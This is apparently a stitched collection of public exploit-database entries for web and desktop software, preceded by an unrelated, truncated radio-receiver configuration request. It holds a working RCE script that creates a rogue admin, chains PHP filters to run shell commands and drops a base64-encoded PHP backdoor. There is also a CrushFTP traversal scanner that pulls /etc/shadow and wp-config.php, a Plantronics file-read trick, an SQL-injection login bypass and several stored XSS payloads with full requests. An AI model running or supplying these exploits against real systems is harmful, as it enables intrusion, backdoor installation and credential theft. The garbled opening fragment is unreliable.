'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

# Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7 # Exploit Author: Juan Marco Sanchez # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html # Version: 1.0 # Tested on: Debian Linux Apache Web Server # CVE: CVE-2024-0264 and CVE-2024-0265 import requests import random import argparse from bs4 import BeautifulSoup parser = argparse.ArgumentParser() parser.add_argument("target") args = parser.parse_args() base_url = args.target phase1_url = base_url + '/LoginRegistration.php?a=save_user' phase2_url = base_url + '/LoginRegistration.php?a=login' filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home" def phase1(): # CVE-2024-0264 rand_user = 'pwn_'+str(random.randint(100, 313)) rand_pass = 'pwn_'+str(random.randint(100, 313)) pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1} print("[*] adding administrator " + rand_user + ":" + rand_pass) phase1 = requests.post(phase1_url, pwn_user_data) if "User Account has been added successfully." in phase1.text: print("[+] Phase 1 Success - Admin user added!\n") print("[*] Initiating Phase 2") phase2(rand_user, rand_pass) else: print("[X] user creation failed :(") die() def phase2(user, password): # CVE-2024-0265 s = requests.Session(); login_data = {'formToken':'','username':user, 'password':password} print("[*] Loggin in....") phase2 = s.post(phase2_url, login_data) if "Login successfully." in phase2.text: print("[+] Login success") else: print("[X] Login failed.") die() print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n") rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';" #print("[*] Payload: " + rce_url) rce = s.get(rce_url) if "jmrcsnchz" in rce.text: print("[+] RCE success!") soup = BeautifulSoup(rce.text, 'html.parser') print("[+] Output of id: " + soup.pre.get_text()) print("[*] Uploading php backdoor....") s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));") print("[+] Access at " + base_url + "/rce.php?0=whoami") else: print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.") die() try: print("[*] Initiating Phase 1") phase1() except: print("Exploit failed.")

# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) # Date: 4/4/2024 # Exploit Author: modrnProph3t # Vendor Homepage: https://www.iboss.com # Version: < 10.2.0 # CVE-2024-3378 # Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md ## Description A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload. This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included. ## Proof of Conept 1. Access the login portal located at /login 2. Submit login attempt and intercept the request Example of unaltered request: ``` POST /user_login_submit HTTP/1.1 Host: <domain> <--Headers Removed--> userName=TEST&x=TEST&action=login&redirectUrl= ``` 3. Insert XSS payload into the "redirectUrl" parameter Example of request with inserted payload: ``` POST /user_login_submit HTTP/1.1 Host: <domain> <--Headers Removed--> userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script> ``` 4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution

import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse, parse_qs, urlencode, urlunparse from requests.exceptions import RequestException class Colors: RED = '\033[91m' GREEN = '\033[1;49;92m' RESET = '\033[0m' def get_cluster_manager_url(base_url, path): print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET) try: response = requests.get(base_url + path) response.raise_for_status() except requests.exceptions.RequestException as e: print(Colors.RED + f"Error: {e}" + Colors.RESET) return None print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET) if response.status_code == 200: print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET) # Use BeautifulSoup to parse the HTML content soup = BeautifulSoup(response.text, 'html.parser') # Find all 'a' tags with 'href' attribute all_links = soup.find_all('a', href=True) # Search for the link containing the Alias parameter in the href attribute cluster_manager_url = None for link in all_links: parsed_url = urlparse(link['href']) query_params = parse_qs(parsed_url.query) alias_value = query_params.get('Alias', [None])[0] if alias_value: print(Colors.GREEN + f"Alias value found" + Colors.RESET) cluster_manager_url = link['href'] break if cluster_manager_url: print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET) return cluster_manager_url else: print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET) return None print(Colors.RED + f"Error: Unable to get the initial step on {base_url}") return None def update_alias_value(url): parsed_url = urlparse(url) query_params = parse_qs(parsed_url.query, keep_blank_values=True) query_params['Alias'] = ["<DedSec-47>"] updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True))) print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET) return updated_url def check_response_for_value(url, check_value): response = requests.get(url) if check_value in response.text: print(Colors.RED + "Website is vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) else: print(Colors.GREEN + "Website is not vulnerable POC by :") print(Colors.GREEN + """ ____ _ ____ _ _ _____ | _ \ ___ __| / ___| ___ ___ | || |___ | | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / | |_| | __/ (_| |___) | __/ (_ |____|__ | / / |____/ \___|\__,_|____/ \___|\___| |_|/_/ github.com/DedSec-47 """) def main(): # Create a command-line argument parser parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager") # Add a command-line argument for the target (-t/--target) parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True) # Add a command-line argument for the URL path (-u/--url) parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True) # Parse the command-line arguments args = parser.parse_args() # Get the cluster manager URL from the specified website cluster_manager_url = get_cluster_manager_url(args.target, args.url) # Check if the cluster manager URL is found if cluster_manager_url: # Modify the URL by adding the cluster manager value modified_url = args.target + cluster_manager_url modified_url = update_alias_value(args.target + cluster_manager_url) print(Colors.GREEN + "Check executed successfully" + Colors.RESET) # Check the response for the value "<DedSec-47>" check_response_for_value(modified_url, "<DedSec-47>") if __name__ == "__main__": main()

# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read # Date: 2024-05-10 # Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from Mastercard # Vendor Homepage: https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895 # Version: Plantronics Hub for Windows version 3.25.1 # Tested on: Windows 10/11 # CVE : CVE-2024-27460 As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner: ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy (any file on the system). The desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp Steps to reproduce (POC): - Open cmd.exe - Navigate using cd C:\ProgramData\Plantronics\Spokes3G - echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config - Desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp

## Exploit Title: CrushFTP Directory Traversal ## Google Dork: N/A # Date: 2024-04-30 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) ## Vendor Homepage: https://www.crushftp.com/ ## Software Link: https://www.crushftp.com/download/ ## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x) ## Tested on: Windows10 import requests import re # Regular expression to validate the URL def is_valid_url(url): regex = re.compile( r'^(?:http|ftp)s?://' # http:// or https:// r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4 r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6 r'(?::\d+)?' # optional: port r'(?:/?|[/?]\S+)$', re.IGNORECASE) return re.match(regex, url) is not None # Function to scan for the vulnerability def scan_for_vulnerability(url, target_files): print("Scanning for vulnerability in the following files:") for target_file in target_files: print(target_file) for target_file in target_files: try: response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10) if response.status_code == 200 and target_file.split('/')[-1] in response.text: print("vulnerability detected in file", target_file) print("Content of file", target_file, ":") print(response.text) else: print("vulnerability not detected or unexpected response for file", target_file) except requests.exceptions.RequestException as e: print("Error connecting to the server:", e) # User input input_url = input("Enter the URL of the CrushFTP server: ") # Validate the URL if is_valid_url(input_url): # Expanded list of allowed files target_files = [ "/var/www/html/index.php", "/var/www/html/wp-config.php", "/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/ssh/sshd_config", "/etc/mysql/my.cnf", # Add more files as needed ] # Start the scan scan_for_vulnerability(input_url, target_files) else: print("Invalid URL entered. Please enter a valid URL.")

# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/chyrp/ # Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip # Version: 2.5.2 # Tested on: MacOS ### Steps to Reproduce ### - Login from the address: http://localhost/chyrp/?action=login. - Click on 'Write'. - Type this payload into the 'Title' field: "><img src=x onerror=alert( "Stored")> - Fill in the 'Body' area and click 'Publish'. - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /chyrp/admin/?action=add_post HTTP/1.1 Host: localhost Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp, */*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598 Content-Length: 1194 Origin: http://localhost Referer: http://localhost/chyrp/admin/?action=write_post Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="title" "><img src=x onerror=alert("Stored")> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="body" <p>1337</p> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="status" public -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="slug" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="created_at" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="original_time" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="trackbacks" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="feather" text -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="hash" 11e11aba15114f918ec1c2e6b8f8ddcf -----------------------------28307567523233313132815561598--

# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/Leafpub # Software Link: https://github.com/Leafpub/leafpub # Version: 1.1.9 # Tested on: MacOS ### Steps to Reproduce ### - Please login from this address: http://localhost/leafpub/admin/login - Click on the Settings > Advanced - Enter the following payload into the "Custom Code" area and save it: ("><img src=x onerror=alert("Stored")>) - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /leafpub/api/settings HTTP/1.1 Host: localhost Cookie: authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 476 Origin: http://localhost Referer: http://localhost/leafpub/admin/settings Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS # Date: 2023-11-25 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://phoenixcart.org/ # Version: v3.0.1 # Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix ## POC: 1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php 2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)// 3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php 4-You will be see alert button

# Exploit Title: PyroCMS v3.0.1 - Stored XSS # Date: 2023-11-25 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://pyrocms.com/ # Version: v3.0.1 # Tested on: https://www.softaculous.com/apps/cms/PyroCMS ---------------------------------------------------------------------------------------------------- 1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1 2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)// 3-Save it and go to this url : https://127.0.0.1/public/admin/redirects 4-You will be see alert button

# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass # Date: 15/03/2024 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html # Tested on: Windows ,XAMPP # CVE : CVE-2024-33288 # Proof of Concept: Step 1-Visit http://localhost/prison/ Step 2 - Click on Admin Dashboard button and redirect on login page. Step 3– Enter username as admin' or '1'='1 and password as 123456 Step 4 – Click sing In and now you will be logged in as admin.

# Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) # Date: 04/16/2024 # Exploit Author: Sergio Medeiros # Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 # Software Link: https://lms.rocket-soft.org # Version: 1.9 # Tested on Firefox and Chrome Browsers # Patched Version: Patch Pending # Category: Web Application # CVE: CVE-2024-34241 # Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide # PoC: In order to exploit this systemic stored XSS vulnerability, identify theareas in the web application which has a WYSIWIG editor used, for example, the create/edit course description section. Input random text in the description section, and create the course while intercepting the request with BurpSuite or your preferred proxy of choice. In the *description* parameter or the associated parameter that is handling the user input related to the WYSIWIG editor, input the following payload and then issue the request: <details/open/ontoggle=prompt(origin)>